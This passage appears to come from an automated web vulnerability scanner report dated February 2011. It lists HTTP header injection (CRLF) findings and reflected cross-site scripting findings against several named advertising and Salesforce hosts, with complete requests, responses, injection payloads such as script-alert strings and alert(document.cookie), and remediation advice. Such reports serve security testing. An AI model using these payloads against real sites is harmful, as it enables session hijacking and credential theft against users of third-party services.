GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=131a5%0d%0ad2c2e010a34&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload 46baf%0d%0a393469f66ab was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=0&res=46baf%0d%0a393469f66ab HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 8bddc%0d%0a1cb899d5230 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=8bddc%0d%0a1cb899d5230&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the avc request parameter is copied into the Set-Cookie response header. The payload 2106c%0d%0aeb95574723e was submitted in the avc parameter. This caused a response containing an injected HTTP header.
Request
GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=2106c%0d%0aeb95574723e&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1 Host: live.activeconversion.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:44 GMT Server: Apache Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=C1524BDBD48BB3A5968A32D0C1902338; Path=/webtracker Set-Cookie: _wt_31021="1296945354839|2106c eb95574723e|0"; Max-Age=630720000;Path=/; HttpOnly P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM" Connection: close Content-Type: image/png Content-Length: 68
The value of the target request parameter is copied into the Location response header. The payload 7ddb9%0d%0ad1e8da5d420 was submitted in the target parameter. This caused a response containing an injected HTTP header.
Request
GET /track?target=7ddb9%0d%0ad1e8da5d420&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:25 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJSQEuhBljgvx6LisqP2AupJFgK5WemUmSqCRZBWwtlJoLJyYgB+x08rWfR/ShFOalNGTqfmziVraghl7E5uw5btOx1dW574W9FJdg9xGu8SZOgKpaXrz/KeWcoywhRG4MQwBrjR5HTBMUxakdzesJAd4Nllx/eIueA718dgTuI7OkPWLq5kZjUJi1hH8BvBRmtvD9sSaTkItOkMvQBn5y8eB2Gp0MskIHLnRFrJebU/IavRUXhAPea4WfMxpEOwV9DXMgU85wESeHUWmEzFegExxv1n4K/i4nOYKeA6L8d0eyjYfz8uXn3ThKSqF9Iq/lRa8qtkQAJ7UE7txh/8Q3dkebSqNOlEMRNgiDUcLqxp3a5iHCGn6SzZvUvsa4JchhEu05jAodlusGhdyDYZ2FHyz9ji7Dr9CcBp9CFsi6xzuPykQkPYHuRmbnXGF33GtvsL21BOvdvWactKWHYZJoFq3keAnHZZ5ScLOxGWr1lc2oUiObTE5Mitwsa52DBLd/xZxi39hOQ==.cEUs/P3Fg8JIxIN0nB7icA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:25 GMT Location: 7ddb9 d1e8da5d420 Content-Length: 202 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="7ddb9 d1e8da5d420">here</a>.</p> </body></html ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7d788%0d%0a7be81555d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/7d788%0d%0a7be81555d22 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/7d788 7be81555d22/ Date: Sat, 05 Feb 2011 22:09:45 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/7d788 7be81555d22/">/servlet/7d788 7be81555d22/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 1b8d9%0d%0af0e07ef42ca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/1b8d9%0d%0af0e07ef42ca HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/1b8d9 f0e07ef42ca/ Date: Sat, 05 Feb 2011 22:10:03 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/1b8d9 f0e07ef42ca/">/servlet/1b8d9 f0e07ef42ca/</a>
4. Cross-site scripting (reflected)
There are 700 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8918"><script>alert(1)</script>cc16b0d36e8 was submitted in the ids parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8 HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.ligatus.com
Path: /timeout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3a4"><script>alert(1)</script>eb71085dfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470 HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a0e"-alert(1)-"872292d8e2e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2e HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7905 Cache-Control: no-cache Pragma: no-cache Date: Sun, 06 Feb 2011 17:47:22 GMT Expires: Sun, 06 Feb 2011 17:47:22 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2ehttp://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2e8'-alert(1)-'f747d321270 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270 HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7905 Cache-Control: no-cache Pragma: no-cache Date: Sun, 06 Feb 2011 17:47:28 GMT Expires: Sun, 06 Feb 2011 17:47:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270http://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73258'-alert(1)-'86e7173ff52 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26 ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bca7e"-alert(1)-"230eda09231 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26 ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b4d"-alert(1)-"63ce073303c was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
